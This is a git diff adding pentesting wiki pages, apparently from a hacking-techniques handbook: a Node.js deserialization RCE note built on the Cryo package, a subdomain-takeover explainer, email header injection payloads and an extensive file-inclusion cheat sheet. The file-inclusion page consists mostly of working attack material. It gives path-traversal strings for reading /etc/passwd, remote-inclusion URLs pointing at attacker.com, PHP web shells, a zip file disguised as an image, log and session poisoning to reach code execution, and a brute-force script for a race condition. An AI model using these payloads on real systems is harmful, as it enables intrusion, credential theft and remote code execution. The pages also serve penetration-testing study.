+Secondly, a call of some function leads to the invoking of the function arguments’ methods. For example, when an object is converted to a string, then methods valueOf, toString of the object are called automatically \(more details [here](http://2ality.com/2012/03/converting-to-string.html)\). So, `console.log(obj)` leads to invocation of `obj.toString()`. Another example, `JSON.stringify(obj)` internally invokes obj.toJSON\(\).  
+Using both of these features, we can get remote code execution in process of interaction between an application `(node.js)` and an object.
+
+I’ve found a nice example – [package Cryo](https://www.npmjs.com/package/cryo), which supports both function serialization and square bracket notation for object reconstruction, but which isn’t vulnerable to IIFE, because it properly manages object \(without using `eval&co`\).  
+Here a code for serialization and deserialization of an object:
+
+```text
+cvar Cryo = require('cryo');
+var obj = {
+testFunc : function() {return 1111;}
+};
+
+var frozen = Cryo.stringify(obj);
+console.log(frozen)
+
+var hydrated = Cryo.parse(frozen);
+console.log(hydrated);
+```
+
+Serialized JSON looks like that. Pretty tangled:
+
+```text
+{"root":"_CRYO_REF_1","references":[{"contents":{},"value":"_CRYO_FUNCTION_function () {return 1111;}"},{"contents":{"testFunc":"_CRYO_REF_0"},"value":"_CRYO_OBJECT_"}]}
+```
+
+For our attack we can create a serialized JSON object with a `custom __proto__`. We can create our object with our own methods for the object’s prototype, but as a small trick, we can set an incorrect name for `__proto__` \(because we don’t want to rewrite a prototype of the object in our application\) and serialize it.
+
+
+
+```text
+var obj = {
+    __proto: {
+        toString: function() {console.log("defconrussia"); return 1111;},
+        valueOf: function() {console.log("defconrussia"); return 2222;}
+    }
+};
+```
+
+So we get serialized object and rename from `__proto` to `__proto__` in it:
+
+```text
+{"root":"CRYO_REF_3","references":[{"contents":{},"value":"_CRYO_FUNCTION_function () {console.log(\"defconrussia\"); return 1111;}"},{"contents":{},"value":"_CRYO_FUNCTION_function () {return 2222;}"},{"contents":{"toString":"_CRYO_REF_0","valueOf":"_CRYO_REF_1"},"value":"_CRYO_OBJECT"},{"contents":{"proto":"CRYO_REF_2"},"value":"_CRYO_OBJECT"}]}
+```
+
+When we send that JSON payload to an application, the package Cryo deserializes the payload in an object, but also changes the object’s prototype to our value. Therefore, if the application interacts with the object somehow, converts it to a sting, for example, then the prototype’s method will be called and our code will be executed. So, it’s RCE.
+
+I tried to find packages with similar issues, but most of them didn’t support serialization of function. I didn’t find any other way to reconstruct `functions in __proto__`. Nevertheless, as many packages use square bracket notation, we can rewrite `__proto__` for them too and spoil prototypes of newly created objects. What happens when an application calls any prototype method of such objects? It may crash due to an unhandled TypeError exception.
+
+In addition, I should mention that the whole idea potentially works for deserialization from any format \(not only JSON\). Once both features are in place, a package is potentially vulnerable. Another thing is that `JSON.parse` is not “vulnerable” to `__proto__ rewriting`.
+
diff --git a/pentesting-web/domain-subdomain-takeover.md b/pentesting-web/domain-subdomain-takeover.md
new file mode 100644
index 00000000..9f0a591d
--- /dev/null
+++ b/pentesting-web/domain-subdomain-takeover.md
@@ -0,0 +1,136 @@
+# Domain/Subdomain takeover
+
+## Domain takeover
+
+If you discover some domain \(domain.tld\) that is **being used by some service inside the scope** but the **company** has l**o**st the **ownership** of it, you can try to **register** it \(if cheap enough\) and let know the company. If this domain is receiving some **sensitive information** like a sessions cookie via **GET** parameter or in the **Referral** header, this is for sure a **vulnerability**.
+
+### Subdomain takeover
+
+A subdomain of the company is pointing to a **third-party service with a name not registered**. If you can **create** an **account** in this **third party service** and **register** the **name** being in use, you can perform the subdomain take over.
+
+There are several tools with dictionaries to check for possible takeovers:
+
+* [https://github.com/EdOverflow/can-i-take-over-xyz](https://github.com/EdOverflow/can-i-take-over-xyz)
+* [https://github.com/haccer/subjack](https://github.com/haccer/subjack)
+* [https://github.com/anshumanbh/tko-sub](https://github.com/anshumanbh/tko-subs)
+* [https://github.com/ArifulProtik/sub-domain-takeover](https://github.com/ArifulProtik/sub-domain-takeover)
+* [https://github.com/SaadAhmedx/Subdomain-Takeover](https://github.com/SaadAhmedx/Subdomain-Takeover)
+* [https://github.com/Ice3man543/SubOver](https://github.com/Ice3man543/SubOver)
+* [https://github.com/m4ll0k/takeover](https://github.com/m4ll0k/takeover)
+* [https://github.com/antichown/subdomain-takeover](https://github.com/antichown/subdomain-takeover)
+
+## Exploiting a Subdomain takeover
+
+**This information was copied from** [**https://0xpatrik.com/subdomain-takeover/**](https://0xpatrik.com/subdomain-takeover/)\*\*\*\*
+
+Recently, I [wrote](https://0xpatrik.com/subdomain-takeover-basics/) about subdomain takeover basics. Although the concept is now generally well-understood, I noticed that people usually struggle to grasp the risks that subdomain takeover brings to the table. In this post, I go in-depth and cover the most notable risks of _subdomain takeover_ from my perspective.
+
+_Note: Some risks are mitigated implicitly by the cloud provider. For instance, when subdomain takeover is possible on Amazon CloudFront, there is no way you can set up TXT records to bypass SPF checks. The post, therefore, aims to provide risks on general subdomain takeover. Nevertheless, most of these apply to cloud providers as well._
+
+### Transparency To a Browser <a id="transparencytoabrowser"></a>
+
+To start off, let's look at DNS resolution where CNAME is involved:
+
+![DNS resolution](https://0xpatrik.com/content/images/2018/05/resolution-2.png)
+
+Note that step \#7 requests _sub.example.com_ rather than _anotherdomain.com_. That is because the web browser is not aware that _anotherdomain.com_ even exist. Even though CNAME record is used, the URL bar in the browser still contains _sub.example.com_. This is the **transparency** for the browser. If you think about that, the browser places all the trust in the DNS resolver to provide accurate information about the domain. Simplified, subdomain takeover is a DNS spoofing for one particular domain across the Internet. Why? Because any browser performing the DNS resolution on affected domain receives A record set by an attacker. The browser then happily shows whatever is received from this server \(thinking that is legitimate\).
+
+Such a domain makes a perfect scenario for phishing. Attackers are often using [_typosquatting_](https://en.wikipedia.org/wiki/Typosquatting) or so-called [_Doppelganger domains_](https://en.wikipedia.org/wiki/Doppelg%C3%A4nger) to mimic the legitimate domain/website for phishing purposes. After an attacker takes over some legitimate domain name, it is almost impossible for a regular user to tell whether the content on the domain is provided by a legitimate party or an attacker. Let's take for instance a random bank. If one of the bank's subdomains is vulnerable to subdomain takeover, an attacker can create an HTML form which mimics the login form to the bank's internet banking system. Then, an attacker can run spear phishing or mass phishing campaign asking users to log in to and change their passwords. At this stage, the passwords are captured by an attacker who is in control of the domain in question. The URL provided in the phishing e-mail is a legitimate subdomain of a bank. Therefore users are not aware of something malicious going on. Spam filters and other security measurements are also less likely to trigger the e-mail as spam or malicious because it contains domain names with higher trust.
+
+Indeed, the domain name itself place a significant role in a successful campaign. Having 5th level subdomain vulnerable to subdomain takeover is much less _"legit"_ that having a 2nd level subdomain with some friendly subdomain name. I saw several instances of perfect subdomains for phishing, including:
+
+* _purchases.SOMETHING.com_
+* _www.SOMETHING.com_
+* _online.SOMETHING.com_
+* _shop.SOMETHING.com_
+
+All of them vulnerable to subdomain takeover. All of them were big brands. Talking about perfect phishing?
+
+Nevertheless, recent phishing campaigns host content on domains with long domain names that include name of the brand \(see [Apple example](https://www.phishtank.com/target_search.php?target_id=183&valid=y&active=All&Search=Search)\). Having valid SSL certificate \(more on that below\), keyword in domain name and website which mimics the website of targeted brand, people tend to fall into these attacks. Think about chances with a legitimate subdomain of this brand.
+
+### SSL Certificates <a id="sslcertificates"></a>
+
+The attack above can be enhanced by generating a valid SSL certificate. Certificate authorities such as [_Let's Encrypt_](https://letsencrypt.org/) allow automatic verification of domain ownership by content verification:
+
+![Let&apos;s Encrypt Flow](https://0xpatrik.com/content/images/2018/05/letsencrypt.png)
+
+That is, if there is a specific content placed on a specific URL path, Let's Encrypt will approve the issuance of a certificate for a given domain. Since an attacker has full control over the content of the domain which is vulnerable to subdomain takeover, this verification can be done in a matter of minutes. Therefore attackers are also able to generate SSL certificate for such domain which only lowers the suspicion of a phishing attack.
+
+### Cookie Stealing <a id="cookiestealing"></a>
+
+This goes hand-in-hand with browser transparency but has different consequences. Web browser implements many security policies to prevent malicious websites from causing harm. This includes things such as [Same-origin policy](https://en.wikipedia.org/wiki/Same-origin_policy). One of the primary security responsibilities of a browser is to secure saved cookies. Why? While HTTP is a stateless protocol, cookies are used to track sessions. For convenience, users often save cookies for an extended period to prevent logging in every single time. These cookies, therefore, act as a login token which is presented to the web server and the user is identified. Attacks such as [_Session hijacking_](https://en.wikipedia.org/wiki/Session_hijacking) naturally evolved from this concept.
+
+The browser automatically presents stored to cookies with every request to the domain that issued them. There is an exception to that such that cookies might be shared across subdomains \([read here](https://tools.ietf.org/html/rfc6265#section-8.6), also notice section 8.7\). It usually happens when the website uses cookie-based [Single sign-on](https://en.wikipedia.org/wiki/Single_sign-on) \(SSO\) system. Using SSO, a user can log in using one subdomain and share the same session token across a wide range of subdomains. The syntax for setting a regular cookie is the following:
+
+```text
+HTTP/1.1 200 OK
+Set-Cookie: name=value
+```
+
+If this cookie is issued by web server residing on _example.com_, only this server can access this cookie later on. However, the cookie can be issued for wildcard domain \(for the reasons explained above\) in the following manner:
+
+```text
+HTTP/1.1 200 OK
+Set-Cookie: name=value; domain=example.com
+```
+
+The cookie will be included in HTTP requests to _example.com_ but also to any other subdomain such as _subdomain.example.com_. This behavior creates a possibility of high severity attacks using subdomain takeover. Suppose that some particular domain is using session cookies for wildcard domain. If there is one subdomain vulnerable to subdomain takeover, the only thing for gathering user’s session token is to trick him or her into visiting the vulnerable subdomain. The session cookie is automatically sent with the HTTP request.
+
+The browser also implements additional security mechanisms for cookies:
+
+* **HttpOnly cookie** — Cookies can by default be accessed by Javascript code running in the context of the website which created the cookies. Javascript can read, update, and delete the cookies. _HttpOnly_ cookie flag \(set by the web server\) indicates that the particular cookie cannot be accessed by Javascript code. The only way to get it is through HTTP request and response headers.
+* **Secure cookie** — When the cookie has the _Secure_ flag set by the web server, it can be communicated back to the web server only if HTTPS is used.
+
+If the domain is vulnerable to subdomain takeover, an attacker can gather cookies issued by that domain in the past just by tricking users into visiting that website. HttpOnly and Secure flags don't help since the cookie is not being accessed using Javascript and SSL certificate can be easily generated for the taken domain.
+
+Cookie stealing using takeover was explained in bug bounty [report](https://hackerone.com/reports/172137) by Arne Swinnen. The report explains the problem with one of the _Ubiquiti Networks_ subdomains \(_ping.ubnt.com_\). This subdomain was vulnerable to subdomain takeover, pointing to unclaimed AWS CloudFront distribution. Since Ubiquiti Networks is using SSO with wildcard session cookies, all users visiting _ping.ubnt.com_ could have their session cookies stolen. Even though this domain is pointing to AWS CloudFront, CloudFront distribution settings allow logging cookies with each request. Therefore the scenario with extracting session cookies is entirely possible even with subdomains pointing to AWS CloudFront. In 2017, Arne also demonstrated similar attack vector against [Uber's SSO system](https://www.arneswinnen.net/2017/06/authentication-bypass-on-ubers-sso-via-subdomain-takeover/).
+
+The behavior explained above is not limited to cookies. Since Javascript scripts have full control over the websites, they are run on, having ability to replace such scripts on the legitimate website might lead to catastrophic consequences. Suppose that website is using Javascript code from the external provider using _script_ tag and _src_ attribute. When the domain of external provider expires, the browser fails silently, i.e., it doesn't trigger any alerts visible to regular users. If the external code is not doing any important stuff \(e.g., it is used only for tracking\) such external provider might stay on the website for an extended period. An attacker can take over this expired domain, match the URL path of provided Javascript code and thus gain control over every visitor that visits the original website.
+
+There is, however, one way of protecting the integrity of Javascript files in a browser. _Subresource Integrity_ [was proposed](https://www.w3.org/TR/2016/REC-SRI-20160623/) as a mechanism to include cryptographic hash as an attribute _integrity_ to _script_ tag in HTML5. When the provided cryptographic hash does not match the download file, the browser refuses to execute it.
+
+### E-mails <a id="emails"></a>
+
+When CNAME subdomain takeover is possible, MX records can be set up by an attacker to an arbitrary web server as well. It allows receiving e-mails to a legitimate subdomain of some brand - particularly useful again in \(spear\) phishing attacks where interaction between an attacker and victim is necessary. Attackers usually spoof `Return-Path` header to receive a reply to the e-mail. With correct MX records, this problem is bypassed.
+
+On the other side, sending e-mails is also possible. Although it is trivial to spoof `From` header to include any e-mail addresses, SPF filters are usually checking `Return-Path` header and allowed mail-sending hosts for the domain. SPF stores configuration in DNS TXT records. With subdomain takeover, TXT records are in control of attacker too - SPF checks can be passed easily.
+
+_As I noted in the beginning, these tactics usually don't work with majority of cloud providers since you don't have control over DNS zone directly._
+
+### Higher Order Risks <a id="higherorderrisks"></a>
+
+The concept of subdomain takeover can be naturally extended to NS records: If the base domain of at least one NS record is available for registration, the source domain name is vulnerable to subdomain takeover.
+
+One of the problems in subdomain takeover using NS record is that the source domain name usually has multiple NS records. Multiple NS records are used for redundancy and load balancing. The nameserver is chosen randomly before DNS resolution. Suppose that the domain _sub.example.com_ has two NS records: _ns.vulnerable.com_ and _ns.nonvulnerable.com_. If an attacker takes over the _ns.vulnerable.com_, the situation from perspective of the user who queries _sub.example.com_ looks as follows:
+
+1. Since there are two nameservers, one is randomly chosen. This means the probability of querying nameserver controlled by an attacker is 50%.
+2. If user's DNS resolver chooses _ns.nonvulnerable.com_ \(legitimate nameserver\), the correct result is returned and likely being cached somewhere between 6 and 24 hours.
+3. If user's DNS resolver chooses _ns.vulnerable.com_ \(nameserver owned by an attacker\), an attacker might provide a false result which will also be cached. Since an attacker is in control of nameserver, she can set TTL for this particular result to be for example one week.
+
+The process above is repeated every time the cache entry expires. When an attacker chooses to use TTL with high value, the false result will stay in DNS cache for that period. During this time, all requests to _sub.example.com_ will use false DNS result cached by an attacker. This idea is even amplified when public DNS resolvers \(e.g., Google DNS\) are used. In this case, public resolvers are likely to cache the false results which means that all users using the same DNS resolver will obtain false results until the cache is revoked.
+
+In addition to control over the source domain name, control over all higher-level domains of source domain name is gained as well. That is because owning a canonical domain name of NS record means owning the full DNS zone of the source domain name.
+
+In 2016, Matthew Bryant [demonstrated](https://thehackerblog.com/the-international-incident-gaining-control-of-a-int-domain-name-with-dns-trickery/index.html) a subdomain takeover using NS record on _maris.int_. The .INT top-level domain is a special TLD, and the only handful of domains are using it. Bryant showed that even though registration of such domain names is approved exclusively by IANA, nameservers can be set to arbitrary domains. Since one of _maris.int_ nameservers was available for registration \(_cobalt.aliis.be_\), subdomain takeover was possible even on this restricted TLD.
+
+Matthew also [demonstrated](https://thehackerblog.com/the-io-error-taking-control-of-all-io-domains-with-a-targeted-registration/index.html) even higher severity attack where he was able to gain control over nameserver of .IO top-level domain. Gaining control over .IO means controlling responses for all .IO domain names. In this case, one of .IO nameservers were _ns-a1.io_ which was available for registration. By registering _ns-a1.io_ Bryant was able to receive DNS queries and control their responses for all .IO domains.
+
+### Mitigation <a id="mitigation"></a>
+
+The mitigation strategies for domain names already vulnerable to subdomain takeover are rather straightforward:
+
+* **Remove the affected DNS record** — The simplest solution is to remove the affected record from the DNS zone. This step is usually used if the organization determines that the affected source domain name is no longer needed.
+* **Claim the domain name** — This means registering the resource in particular cloud provider or a case of a regular Internet domain, repurchasing the expired domain.
+
+To prevent subdomain takeover in the future, organizations should change the process of creating and destructing resources in their infrastructure. In case of resource creation, the DNS record creation has to be the _last step_ of this process. This condition prevents DNS record to be pointing to a non-existing domain at any point in time. For resource destruction, the opposite holds: DNS record needs to be removed as the _first step_ in this process. Tools such as [aquatone](https://github.com/michenriksen/aquatone) include checks for subdomain takeover. The checks should be periodically performed by a security team of an organization to verify that there are no vulnerable domains. Processes for central collection of exposed domain names are often not efficient inside organizations \(due to global teams, etc.\) and external monitoring is usually the best way to go.
+
+Mitigation strategy for cloud providers should be considered as well. Cloud services are not verifying the domain ownership. The reason behind this is primarily convenience. Cloud provider is not introducing any vulnerability by not verifying ownership of a source domain name. It is therefore up to the user to monitor its DNS records. Another reason is, that when cloud resource is removed, the user is usually no longer a customer of that service. The question cloud providers then ask themselves is: Why should we even care?
+
+Providers such as [GitLab](https://about.gitlab.com/2018/02/05/gitlab-pages-custom-domain-validation/) realized that subdomain takeover is an issue and implemented a domain verification mechanism.
+
+_Some parts of this post are excerpts from my_ [_Master's Thesis_](https://is.muni.cz/th/byrdn/Thesis.pdf).
+
+Until next time!
+
+[Patrik](https://twitter.com/0xpatrik)
+
diff --git a/pentesting-web/email-header-injection.md b/pentesting-web/email-header-injection.md
new file mode 100644
index 00000000..e43ccb60
--- /dev/null
+++ b/pentesting-web/email-header-injection.md
@@ -0,0 +1,36 @@
+# Email Header Injection
+
+[https://resources.infosecinstitute.com/email-injection/](https://resources.infosecinstitute.com/email-injection/)
+
+## Inject Cc and Bcc after sender argument
+
+```text
+From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com
+```
+
+The message will be sent to the recipient and recipient1 accounts.
+
+## Inject argument
+
+```text
+From:sender@domain.com%0ATo:attacker@domain.com
+```
+
+The message will be sent to the original recipient and the attacker account.
+
+## Inject Subject argument
+
+```text
+From:sender@domain.com%0ASubject:This’s%20Fake%20Subject
+```
+
+The fake subject will be added to the original subject and in some cases will replace it. It depends on the mail service behavior.
+
+## Change the body of the message
+
+Inject a two-line feed, then write your message to change the body of the message.
+
+```text
+From:sender@domain.com%0A%0AMy%20New%20%0Fake%20Message.
+```
+
diff --git a/pentesting-web/file-inclusion.md b/pentesting-web/file-inclusion.md
new file mode 100644
index 00000000..963c96de
--- /dev/null
+++ b/pentesting-web/file-inclusion.md
@@ -0,0 +1,344 @@
+# File Inclusion/Path traversal
+
+## File Inclusion
+
+**Remote File Inclusion \(RFI\):** The file is loaded from a remote server \(Best: You can write the code and the server will execute it\). In php this is **disabled** by default \(**allow\_url\_include**\).  
+**Local File Inclusion \(LFI\):** The sever loads a local file.
+
+The vulnerability occurs when the user can control in some way the file that is going to be load by the server.
+
+Vulnerable **PHP functions**: require, require\_once, include, include\_once
+
+A interesting tool to exploit this vulnerability: [https://github.com/kurobeats/fimap](https://github.com/kurobeats/fimap)
+
+## Blind - Interesting - LFI2RCE files
+
+### **Linux**
+
+**Mixing several \*nix LFI lists and adding more paths I have created this one:**
+
+{% file src="../.gitbook/assets/lfi \(2\).txt" %}
+
+A list that uses several techniques to find the file /etc/password \(to check if the vulnerability exists\) can be found [here](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-nix.txt)
+
+### **Windows**
+
+Using theses lists and deleting repetitions I have created a new one:
+
+* [https://raw.githubusercontent.com/soffensive/windowsblindread/master/windows-files.txt](https://raw.githubusercontent.com/soffensive/windowsblindread/master/windows-files.txt)
+* [https://www.gracefulsecurity.com/path-traversal-cheat-sheet-windows/](https://www.gracefulsecurity.com/path-traversal-cheat-sheet-windows/)
+* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal)
+* [https://github.com/soffensive/windowsblindread/blob/master/windows-files.txt](https://github.com/soffensive/windowsblindread/blob/master/windows-files.txt)
+* [http://awesomehackers.org/2018/05/11/path-traversal-cheat-sheet/](http://awesomehackers.org/2018/05/11/path-traversal-cheat-sheet/)
+
+{% file src="../.gitbook/assets/winlfi.txt" %}
+
+A list that uses several techniques to find the file /boot.ini \(to check if the vulnerability exists\) can be found [here](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-win.txt)
+
+### **OS X**
+
+Check the LFI list of linux.
+
+## Basic LFI and bypasses
+
+All the examples are for Local File Inclusion but could be applied to Remote File Inclusion also \(page=http://myserver.com/phpshellcode.txt\).
+
+```text
+http://example.com/index.php?page=../../../etc/passwd
+```
+
+### traversal sequences stripped non-recursively
+
+```python
+http://example.com/index.php?page=....//....//....//etc/passwd
+http://example.com/index.php?page=....\/....\/....\/etc/passwd
+http://some.domain.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
+```
+
+### **Null byte \(%00\)**
+
+Bypass the append more chars at the end of the provided string \(bypass of: $\_GET\['param'\]."php"\)
+
+```text
+http://example.com/index.php?page=../../../etc/passwd%00
+```
+
+This is **solved since PHP 5.4**
+
+### **Encoding**
+
+You could use non-standard encondings like double URL encode \(and others\):
+
+```text
+http://example.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
+http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
+http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
+http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
+```
+
+### From existent folder
+
+Maybe the back-end is checking the folder path:
+
+```python
+http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd
+```
+
+### **Path truncation**
+
+Bypass the append of more chars at the end of the provided string \(bypass of: $\_GET\['param'\]."php"\)
+
+```text
+In PHP: /etc/passwd = /etc//passwd = /etc/./passwd = /etc/passwd/ = /etc/passwd/.
+Check if last 6 chars are passwd --> passwd/
+Check if last 4 chars are ".php" --> shellcode.php/.
+```
+
+```text
+http://example.com/index.php?page=a/../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
+http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.
+
+#With the next options, by trial and error, you have to discover how many "../" are needed to delete the appended string but not "/etc/passwd" (near 2027)
+
+http://example.com/index.php?page=a/./.[ADD MORE]/etc/passwd
+http://example.com/index.php?page=a/../../../../[ADD MORE]../../../../../etc/passwd
+```
+
+Always try to **start** the path **with a fake directory** \(a/\).
+
+**This vulnerability was corrected in PHP 5.3.**
+
+### **Filter bypass tricks**
+
+```text
+http://example.com/index.php?page=....//....//etc/passwd
+http://example.com/index.php?page=..///////..////..//////etc/passwd
+http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
+Maintain the initial path: http://example.com/index.php?page=/var/www/../../etc/passwd
+```
+
+## Basic RFI
+
+```python
+http://example.com/index.php?page=http://atacker.com/mal.php
+http://example.com/index.php?page=\\attacker.com\shared\mal.php
+```
+
+## LFI / RFI using PHP wrappers
+
+### Wrapper php://filter
+
+#### Base64 and rot13
+
+The part "php://filter" is case insensitive
+
+```text
+http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
+http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
+http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
+```
+
+#### zlib \(compression\)
+
+Can be chained with a **compression** wrapper for large files.
+
+```text
+http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
+```
+
+To read the comppression data you need to decode the base64 and read the resulting data using:
+
+```bash
+php -a #Starts a php console
+readfile('php://filter/zlib.inflate/resource=test.deflated');
+```
+
+**NOTE: Wrappers can be chained**
+
+### Wrapper zip://
+
+Upload a Zip file with a PHPShell inside and access it.
+
+```bash
+echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;  
+zip payload.zip payload.php;
+mv payload.zip shell.jpg;
+rm payload.php
+
+http://example.com/index.php?page=zip://shell.jpg%23payload.php
+```
+
+### Wrapper data://
+
+```text
+http://example.net/?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
+http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
+NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
+```
+
+Fun fact: you can trigger an XSS and bypass the Chrome Auditor with : `http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+`
+
+### Wrapper expect://
+
+Expect has to be activated. You can execute code using this.
+
+```text
+http://example.com/index.php?page=expect://id
+http://example.com/index.php?page=expect://ls
+```
+
+### Wrapper input://
+
+Specify your payload in the POST parameters
+
+```text
+http://example.com/index.php?page=php://input
+POST DATA: <? system('id'); ?>
+```
+
+### Wrapper phar://
+
+Check [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal)
+
+## LFI2RCE
+
+### Via Apache log file
+
+If the Apache server is vulnerable to LFI inside the include function you could try to access to _**/var/log/apache2/access.log**_, set inside the user agent or inside a GET parameter a php shell like `<?php system($_GET['c']); ?>` and execute code using the "c" GET parameter.
+
+Note that **if you use double quotes** for the shell instead of **simple quotes**, the double quotes will be modified for the string "_**quote;**_", **PHP will throw an error** there and **nothing else will be executed**.
+
+This could also be done in other logs but b**e carefull,** the code inside the logs could be URL encoded and this could destroy the Shell. The header **authorisation "basic"** contains "user:password" in Base64 and it is decoded inside the logs. The PHPShell could be inserted insithe this header.
+
+### Via Email
+
+Send a mail to a internal account \(user@localhost\) containing `<?php echo system($_REQUEST["cmd"]); ?>` and access to the mail _**/var/mail/USER&cmd=whoami**_
+
+### Via /proc/\*/fd/\*
+
+1. Upload a lot of shells \(for example : 100\)
+2. Include [http://example.com/index.php?page=/proc/$PID/fd/$FD](http://example.com/index.php?page=/proc/$PID/fd/$FD), with $PID = PID of the process \(can be bruteforced\) and $FD the filedescriptor \(can be bruteforced too\)
+
+### Via /proc/self/environ
+
+Like a log file, send the payload in the User-Agent, it will be reflected inside the /proc/self/environ file
+
+```text
+GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
+User-Agent: <?=phpinfo(); ?>
+```
+
+### Via upload
+
+If you can upload a file, just inject the shell payload in it \(e.g : `<?php system($_GET['c']); ?>` \).
+
+```text
+http://example.com/index.php?page=path/to/uploaded/file.png
+```
+
+In order to keep the file readable it is best to inject into the metadata of the pictures/doc/pdf
+
+### Via Zip fie upload
+
+Upload a ZIP file containing a PHP shell compressed and access:
+
+```python
+example.com/page.php?file=zip://path/to/zip/hello.zip%23rce.php
+```
+
+### Via PHP sessions
+
+Check if the website use PHP Session \(PHPSESSID\)
+
+```text
+Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
+Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
+```
+
+In PHP these sessions are stored into _/var/lib/php5/sess\_\[PHPSESSID\]_ files
+
+```text
+/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
+user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
+```
+
+Set the cookie to `<?php system('cat /etc/passwd');?>`
+
+```text
+login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php
+```
+
+Use the LFI to include the PHP session file
+
+```text
+login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm2
+```
+
+### Via ssh
+
+If ssh is active check which user is being used \(/proc/self/status & /etc/passwd\) and try to access **&lt;HOME&gt;/.ssh/id\_rsa**
+
+### Via phpinfo\(\) \(file\_uploads = on\)
+
+To exploit this vulnerability you need: **A LFI vulnerability, a page where phpinfo\(\) is displayed, "file\_uploads = on" and the server has to be able to write in the "/tmp" directory.**
+
+[https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/File%20Inclusion/phpinfolfi.py](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/File%20Inclusion/phpinfolfi.py)
+
+**Turotial HTB**: [https://www.youtube.com/watch?v=rs4zEwONzzk&t=600s](https://www.youtube.com/watch?v=rs4zEwONzzk&t=600s)
+
+You need to fix the exploit \(change  **=&gt;** for **=&gt;**\). To do so you can do:
+
+```text
+sed -i 's/\[tmp_name\] \=>/\[tmp_name\] =\&gt/g' phpinfolfi.py
+```
+
+You have to change also the **payload** at the beginning of the exploit \(for a php-rev-shell for example\), the **REQ1** \(this should point to the phpinfo page and should have the padding included, i.e.: _REQ1="""POST /install.php?mode=phpinfo&a="""+padding+""" HTTP/1.1\r_\), and **LFIREQ** \(this should point to the LFI vulnerability, i.e.: _LFIREQ="""GET /info?page=%s%%00 HTTP/1.1\r   --_  Check the double "%" when exploiting null char\)
+
+{% file src="../.gitbook/assets/lfi-with-phpinfo-assistance.pdf" %}
+
+#### Theory 
+
+If uploads are allowed in PHP and you try to upload a file, this files is stored in a temporal directory until the server has finished processing the request, then this temporary files is deleted.
+
+Then, if have found a LFI vulnerability in the web server you can try to guess the name of the temporary file created and exploit a RCE accessing the temporary file before it is deleted.
+
+In **Windows** the files are usually stored in  **C:\Windows\temp\php&lt;&lt;**
+
+In **linux** the name of the file use to be **random** and located in **/tmp**. As the name is random, it is needed to **extract from somewhere the name of the temporal file** and access it before it is deleted. This can be done reading the value of the **variable $\_FILES** inside the content of the function "**phpconfig\(\)**".
+
+**phpinfo\(\)**
+
+**PHP** uses a buffer of **4096B** and when it is **full**, it is **send to the client**. Then the client can **send** **a lot of big requests** \(using big headers\) **uploading a php** reverse **shell**, wait for the **first part of the phpinfo\(\) to be returned** \(where the name of the temporary file is\) and try to **access the temp file** before the php server deletes the file exploiting a LFI vulnerability.
+
+**Python script to try to bruteforce the name \(if length = 6\)**
+
+```python
+import itertools
+import requests
+import sys
+
+print('[+] Trying to win the race')
+f = {'file': open('shell.php', 'rb')}
+for _ in range(4096 * 4096):
+    requests.post('http://target.com/index.php?c=index.php', f)
+
+
+print('[+] Bruteforcing the inclusion')
+for fname in itertools.combinations(string.ascii_letters + string.digits, 6):
+    url = 'http://target.com/index.php?c=/tmp/php' + fname
+    r = requests.get(url)
+    if 'load average' in r.text:  # <?php echo system('uptime');
+        print('[+] We have got a shell: ' + url)
+        sys.exit(0)
+
+print('[x] Something went wrong, please try again')
+```
+
+### References
+
+[PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal)  
+[PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders)  
+
+
+{% file src="../.gitbook/assets/en-local-file-inclusion-1.pdf" %}
+
diff --git a/pentesting-web/file-upload.md b/pentesting-web/file-upload.md
new file mode 100644
index 00000000..3a54ead6
